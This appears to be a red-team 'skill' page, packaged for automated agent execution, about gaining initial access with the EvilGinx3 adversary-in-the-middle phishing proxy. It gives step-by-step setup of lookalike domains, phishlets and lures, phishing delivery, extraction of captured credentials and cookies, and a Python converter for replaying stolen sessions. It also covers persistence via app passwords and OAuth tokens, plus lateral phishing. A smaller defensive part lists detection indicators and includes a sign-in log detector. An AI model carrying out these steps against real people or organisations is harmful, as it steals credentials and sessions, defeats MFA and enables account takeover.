Performing Initial Access with EvilGinx3
Overview
EvilGinx3 (the 3.x line of Evilginx, still published under the `evilginx2` repository name) is an adversary-in-the-middle (AiTM) phishing framework that captures login credentials together with the session cookies issued after authentication, which lets an attacker bypass most forms of multi-factor authentication (MFA). Unlike traditional credential phishing, which collects usernames and passwords from a static clone of a login page, EvilGinx3 runs as a transparent reverse proxy between the victim and the legitimate authentication service: the victim interacts with the real site, completes the real MFA prompt, and the proxy records the session cookies the service sets afterwards. Because those cookies represent an already-authenticated session, replaying them does not trigger a second MFA challenge. This makes it a standard tool for red teams demonstrating the risk of AiTM attacks against organizations that rely on OTP- or push-based MFA. Phishing-resistant methods such as FIDO2/WebAuthn, whose credentials are bound to the legitimate origin, are not bypassed by this technique.
Objectives
- Deploy EvilGinx3 with custom phishlets targeting authorized scope
- Configure DNS and SSL certificates for the phishing domain
- Capture session cookies issued after the victim completes MFA, so that replaying them bypasses the MFA challenge
- Import stolen session cookies into a browser to hijack authenticated sessions
- Integrate with GoPhish or custom delivery mechanisms for phishing email campaigns
- Document the complete attack chain from phishing email to authenticated access
MITRE ATT&CK Mapping
- T1566.002 - Phishing: Spearphishing Link
- T1557 - Adversary-in-the-Middle
- T1539 - Steal Web Session Cookie
- T1078 - Valid Accounts
- T1556 - Modify Authentication Process
- T1550.004 - Use Alternate Authentication Material: Web Session Cookie
Implementation Steps
Phase 1: Infrastructure Setup
- Register a convincing lookalike domain (e.g., using homoglyphs or typosquatting)
- Provision a VPS and create DNS A records for the base domain and the phishlet hostnames (a wildcard record is simplest) pointing at the server IP; inbound TCP 80 and 443 must be reachable for certificate issuance and proxying
- Install EvilGinx3:
```bash
git clone https://github.com/kgretzky/evilginx2.git   # Evilginx 3.x lives in the evilginx2 repository
cd evilginx2
make                                                  # requires a Go toolchain
sudo ./bin/evilginx -p ./phishlets                    # root is needed to bind DNS/HTTP/HTTPS ports; -p is the phishlet directory
```
- Configure the domain and IP in EvilGinx3:
```
config domain example-phish.com
config ipv4 <server-ip>
```
- EvilGinx3 requests Let's Encrypt certificates for each phishlet hostname once the phishlet is enabled; the hostname must already resolve to the server and ports 80/443 must be open. Every issued certificate is published to certificate transparency logs, which is exactly what domain-monitoring defenders watch
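Choosing a lookalike domain (step 1 above) and later spotting its certificate in CT logs are the same computation from two sides. The following is an added example, not Evilginx code: it enumerates typosquat and confusable variants of one legitimate domain and matches a list of CT-style hostnames against them. The confusable map, keyword list, TLD list and the sample CT hostnames are all constructed assumptions.

```python
"""Lookalike-domain candidate generation for one legitimate domain, plus a
matcher for certificate-transparency style hostnames. Added example, not
Evilginx code; confusable map, keyword list and TLD list are assumptions."""

# ASCII confusables only; IDN homoglyphs (Cyrillic letters, punycode) are out of scope here.
CONFUSABLES = {"o": ["0"], "l": ["1", "i"], "i": ["l", "1"],
               "m": ["rn"], "w": ["vv"], "e": ["3"], "a": ["4"]}
KEYWORDS = ("login", "secure", "sso", "auth", "mail")
TLDS = ("com", "net", "org", "co", "io", "app")


def split_domain(domain):
    """'contoso.com' -> ('contoso', 'com'); expects a registrable domain, not a host."""
    label, _, tld = domain.lower().partition(".")
    return label, tld


def typosquats(domain):
    """Omission, doubling, confusable swap, transposition and keyword variants."""
    label, tld = split_domain(domain)
    out = set()
    for i in range(len(label)):
        out.add(label[:i] + label[i + 1:])                 # drop one character
        out.add(label[:i] + label[i] + label[i:])          # double one character
        for sub in CONFUSABLES.get(label[i], []):
            out.add(label[:i] + sub + label[i + 1:])       # swap in a confusable
    for i in range(len(label) - 1):
        out.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])  # transpose neighbours
    for kw in KEYWORDS:
        out.add(f"{label}-{kw}")
        out.add(f"{kw}-{label}")
    out.discard(label)
    return sorted(f"{c}.{tld}" for c in out if c)


def tld_swaps(domain):
    label, tld = split_domain(domain)
    return sorted(f"{label}.{t}" for t in TLDS if t != tld)


def lookalikes(domain):
    return sorted(set(typosquats(domain)) | set(tld_swaps(domain)))


def registrable(host):
    """Strip a wildcard prefix and keep the last two labels.
    Assumption: no multi-label public suffixes (co.uk) in the input."""
    host = host.lower()
    if host.startswith("*."):
        host = host[2:]
    return ".".join(host.split(".")[-2:])


def match_ct_entries(domain, ct_hostnames):
    """Return (hostname, registrable domain) for CT entries that hit a candidate."""
    cands = set(lookalikes(domain))
    return [(h, registrable(h)) for h in ct_hostnames if registrable(h) in cands]


# Constructed CT-log style hostnames for the demo; not real certificate data.
SAMPLE_CT_HOSTNAMES = [
    "login.c0ntoso.com",        # confusable o -> 0
    "sso.contoso-login.com",    # keyword suffix
    "mail.contoso.com",         # the real domain: must not match
    "*.contoso.io",             # TLD swap on a wildcard certificate
    "www.example.com",          # unrelated
]

if __name__ == "__main__":
    for host, reg in match_ct_entries("contoso.com", SAMPLE_CT_HOSTNAMES):
        print(f"lookalike certificate: {host} ({reg})")
```

On the defensive side the same candidate list is what you feed to a CT-log watcher (crt.sh, Censys); on the offensive side it is the shortlist you check for availability before registering. The generator is deliberately single-edit: two simultaneous edits explode the candidate count and rarely look convincing.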
Phase 2: Phishlet Configuration
- Select or create a phishlet for the target service (e.g., Microsoft 365, Google Workspace). EvilGinx3 ships only an `example` phishlet; phishlets for specific services must be written or obtained separately and placed in the directory passed with `-p`:
```
phishlets hostname o365 login.example-phish.com
phishlets enable o365
```
- Verify phishlet is active and SSL certificate is issued:
```
phishlets
```
- Create a lure URL for the phishing campaign:
```
lures create o365
lures get-url 0
```
- Optionally configure a redirect URL for post-capture:
```
lures edit 0 redirect_url https://legitimate-site.com
```
Phase 3: Phishing Delivery
- Craft a pretext email with the lure URL embedded
- Use GoPhish or manual SMTP for email delivery; EvilGoPhish combines the two so that GoPhish handles sending and per-recipient tracking while EvilGinx3 handles credential and session capture on click
- Implement URL masking or shortening if needed for link obfuscation
- Deploy landing page with appropriate social engineering pretext
Phase 4: Session Hijacking
- Monitor EvilGinx3 for captured sessions:
```
sessions
sessions <session-id>
```
- Extract captured session cookies from the session; the per-session view shows the username and password, the session cookies (the authentication tokens, printed as a JSON array), and any custom parameters the phishlet was configured to capture
- Import session cookies into a browser using a cookie editor extension:
  - Copy the JSON cookie array printed for the session; it is already in the import format these extensions accept
  - In a clean browser profile, open the target's login domain, then import the cookies with Cookie-Editor or EditThisCookie; they are only valid for the domains they were set on
  - Reload and navigate to the target service to validate the session hijack
- Establish persistent access by creating application passwords or OAuth tokens
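When the hijack is scripted rather than done in a browser, the same JSON array has to be turned into something curl or a Python HTTP client understands. The following is an added example, not Evilginx code: it parses an EditThisCookie-style cookie array, drops expired entries, and emits both a Netscape `cookies.txt` for `curl -b` and an `http.cookiejar.CookieJar` for `requests`. The sample session is constructed; the field names beyond `name`, `value` and `domain` are an assumption about the export shape.

```python
"""Convert the JSON cookie array Evilginx prints for a captured session into
(a) a Netscape cookies.txt usable by curl -b and (b) an http.cookiejar
CookieJar usable by requests. Added example, not Evilginx code. The sample
session below is constructed; fields beyond name/value/domain are assumptions."""
import json
import time
from http.cookiejar import Cookie, CookieJar

# Constructed sample: cookie names mirror Microsoft's ESTSAUTH* session cookies,
# values are placeholders. The third cookie is already expired.
SAMPLE_SESSION_JSON = """[
  {"name": "ESTSAUTH", "value": "constructed-token-1", "domain": ".login.microsoftonline.com",
   "path": "/", "expirationDate": 4102444800, "httpOnly": true, "secure": true},
  {"name": "ESTSAUTHPERSISTENT", "value": "constructed-token-2", "domain": ".login.microsoftonline.com",
   "path": "/", "expirationDate": 4102444800, "httpOnly": true, "secure": true},
  {"name": "stale", "value": "old", "domain": ".login.microsoftonline.com",
   "path": "/", "expirationDate": 1600000000, "httpOnly": false, "secure": true}
]"""


def parse_cookie_json(text):
    """Validate the array and fill defaults for optional fields."""
    cookies = json.loads(text)
    if not isinstance(cookies, list):
        raise ValueError("expected a JSON array of cookie objects")
    for c in cookies:
        for key in ("name", "value", "domain"):
            if key not in c:
                raise ValueError(f"cookie missing {key!r}: {c}")
        c.setdefault("path", "/")
        c.setdefault("httpOnly", False)
        c.setdefault("secure", True)
    return cookies


def drop_expired(cookies, now=None):
    """Browsers silently ignore expired cookies; drop them up front so a
    failed replay is not misread as a revoked session."""
    now = time.time() if now is None else now
    return [c for c in cookies
            if c.get("expirationDate") is None or c["expirationDate"] > now]


def to_netscape(cookies):
    """Netscape format: domain, include-subdomains flag, path, secure, expiry, name, value.
    curl understands the '#HttpOnly_' prefix on the domain for HttpOnly cookies."""
    lines = ["# Netscape HTTP Cookie File"]
    for c in cookies:
        domain = c["domain"]
        lines.append("\t".join([
            ("#HttpOnly_" if c["httpOnly"] else "") + domain,
            "TRUE" if domain.startswith(".") else "FALSE",
            c["path"],
            "TRUE" if c["secure"] else "FALSE",
            str(int(c.get("expirationDate") or 0)),
            c["name"],
            c["value"],
        ]))
    return "\n".join(lines) + "\n"


def to_cookiejar(cookies):
    """Build a CookieJar so the session can be replayed from requests or urllib."""
    jar = CookieJar()
    for c in cookies:
        domain = c["domain"]
        jar.set_cookie(Cookie(
            version=0, name=c["name"], value=c["value"],
            port=None, port_specified=False,
            domain=domain, domain_specified=True,
            domain_initial_dot=domain.startswith("."),
            path=c["path"], path_specified=True,
            secure=bool(c["secure"]),
            expires=int(c["expirationDate"]) if c.get("expirationDate") else None,
            discard=False, comment=None, comment_url=None,
            rest={"HttpOnly": None} if c["httpOnly"] else {},
        ))
    return jar


if __name__ == "__main__":
    live = drop_expired(parse_cookie_json(SAMPLE_SESSION_JSON))
    with open("cookies.txt", "w") as fh:
        fh.write(to_netscape(live))
    print(f"wrote {len(live)} cookies; replay with: curl -b cookies.txt https://<target>/")
```

With `requests`, pass the jar directly: `requests.get(url, cookies=to_cookiejar(live))`. Keep the client's TLS and User-Agent close to a real browser when replaying; the IdP sees the replay arriving from a new IP with a new client fingerprint, which is precisely the signal the detection section below relies on.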
Phase 5: Post-Access Activities
- Enumerate mailbox contents, contacts, and shared drives
- Identify additional targets for lateral phishing
- Check for access to connected cloud applications (SharePoint, Teams, OneDrive)
- Document all captured credentials and access achieved
Tools and Resources
| Tool | Purpose | Platform |
|---|---|---|
| EvilGinx3 | AiTM phishing framework | Linux |
| GoPhish | Phishing campaign management | Cross-platform |
| EvilGoPhish | Combined EvilGinx3 + GoPhish integration | Linux |
| Cookie-Editor | Browser cookie import/export | Browser Extension |
| Modlishka | Alternative AiTM proxy framework | Linux |
| Muraena | Alternative AiTM phishing proxy | Linux |
Phishlet Targets
| Target Service | Phishlet | Captured Data |
|---|---|---|
| Microsoft 365 | o365 | Session cookies, credentials |
| Google Workspace | | Session cookies, credentials |
| Okta | okta | Session tokens, credentials |
| GitHub | github | Session cookies, credentials |
| AWS Console | aws | Session tokens, credentials |
Detection Indicators
| Indicator | Detection Method |
|---|---|
| Newly registered lookalike domains | Domain monitoring and certificate transparency logs |
| SSL certificates for suspicious domains | CT log monitoring (crt.sh, Censys) |
| Unusual login locations after phishing | SIEM correlation of authentication events; the interactive sign-in itself arrives from the proxy's VPS address, not from the user's network |
| Session cookie replay from a different IP | Correlate the sign-in IP with later activity IP and user agent for the same session; IdP risk signals such as Microsoft Entra ID Protection's anomalous-token detection |
| Proxied login traffic | The IdP sees a client IP and TLS client fingerprint belonging to the proxy (a Go TLS stack) rather than the user's browser; on the endpoint, the browser's requests go to the lookalike hostname instead of the real login host |
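The two indicators in the table that can be automated from sign-in logs, a sign-in sourced from hosting address space and a session reused from a new IP shortly afterwards, are shown below as an added example that is not from any vendor or from this page's tooling. The log shape (one JSON event per line with `event`, `ip`, `session_id`, `ua`) and the hosting ranges are assumptions; the events themselves are constructed.

```python
"""Two detections for AiTM session theft over IdP sign-in/activity events:
(1) an interactive sign-in sourced from a hosting-provider range (the IdP
sees the proxy VPS, not the victim), and (2) a session reused from a
different IP shortly after sign-in (replayed cookie). Added example, not
from any vendor; the log shape and the hosting ranges are assumptions."""
import ipaddress
import json
from datetime import datetime

# Constructed sample events. A "signin" creates a session; later "activity"
# rows carry the same session_id, as an IdP's sign-in and audit logs would.
SAMPLE_LOG = """\
{"ts":"2024-05-01T09:00:00Z","user":"alice@contoso.com","event":"signin","ip":"203.0.113.10","session_id":"S1","ua":"Chrome/124"}
{"ts":"2024-05-01T09:02:00Z","user":"alice@contoso.com","event":"activity","ip":"198.51.100.7","session_id":"S1","ua":"Firefox/125"}
{"ts":"2024-05-01T09:05:00Z","user":"bob@contoso.com","event":"signin","ip":"192.0.2.20","session_id":"S2","ua":"Chrome/124"}
{"ts":"2024-05-01T10:00:00Z","user":"bob@contoso.com","event":"activity","ip":"192.0.2.20","session_id":"S2","ua":"Chrome/124"}
"""

# Assumption: address space where no legitimate user sits (hosting/VPS ranges,
# here a documentation prefix). Feed it from your own IP-reputation data.
HOSTING_NETS = [ipaddress.ip_network("203.0.113.0/24")]


def parse_log(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
        ev["ip"] = ipaddress.ip_address(ev["ip"])
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def proxy_signins(events, nets=HOSTING_NETS):
    """Rule 1: interactive sign-in from a hosting range."""
    return [
        {"rule": "signin_from_hosting_range", "user": e["user"],
         "session_id": e["session_id"], "ip": str(e["ip"])}
        for e in events
        if e["event"] == "signin" and any(e["ip"] in n for n in nets)
    ]


def session_ip_changes(events, window_seconds=3600):
    """Rule 2: same session_id active from a new IP within the window.
    One finding per session; a user-agent change is reported as supporting evidence."""
    origin, flagged, findings = {}, set(), []
    for e in events:
        sid = e["session_id"]
        if e["event"] == "signin":
            origin[sid] = e
            continue
        o = origin.get(sid)
        if o is None or sid in flagged:
            continue
        age = (e["ts"] - o["ts"]).total_seconds()
        if e["ip"] != o["ip"] and age <= window_seconds:
            flagged.add(sid)
            findings.append({
                "rule": "session_replay_from_new_ip", "user": e["user"],
                "session_id": sid, "signin_ip": str(o["ip"]), "replay_ip": str(e["ip"]),
                "seconds_after_signin": age, "ua_changed": e.get("ua") != o.get("ua"),
            })
    return findings


def analyze(text):
    events = parse_log(text)
    return proxy_signins(events) + session_ip_changes(events)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(json.dumps(finding))
```

The two rules cover each other's blind spot: if the operator replays the cookies from the same VPS that proxied the sign-in, rule 2 stays silent but rule 1 fires; if the VPS is not in the range list, rule 2 catches the replay from the operator's workstation. Rule 2 alone is noisy for mobile users who change networks, so in production add ASN or geolocation to the comparison rather than raw IP equality.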
Validation Criteria
- [ ] EvilGinx3 deployed with valid SSL certificates
- [ ] Phishlet configured and enabled for target service
- [ ] Lure URL generated and accessible
- [ ] Test credentials captured successfully through phishing flow
- [ ] Session cookies captured and validated for MFA bypass
- [ ] Session hijack demonstrated in browser with stolen cookies
- [ ] Post-authentication access to target service confirmed
- [ ] Evidence documented with screenshots and session logs
Compliance Framework Mapping
This skill supports compliance evidence collection across multiple frameworks:
- SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
- ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
- NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
- NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)
Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.
Deploying This Skill with Claw GRC
Agent Execution
Register this skill with your Claw GRC agent for automated execution:
```
# Install via CLI
npx claw-grc skills add performing-initial-access-with-evilginx3
# Or load dynamically via MCP
grc.load_skill("performing-initial-access-with-evilginx3")
```
Audit Trail Integration
When executed through Claw GRC, every step of this skill generates tamper-evident audit records:
- SHA-256 chain hashing ensures no step can be modified after execution
- Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
- Trust score impact — successful execution increases your agent's trust score
Continuous Compliance
Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.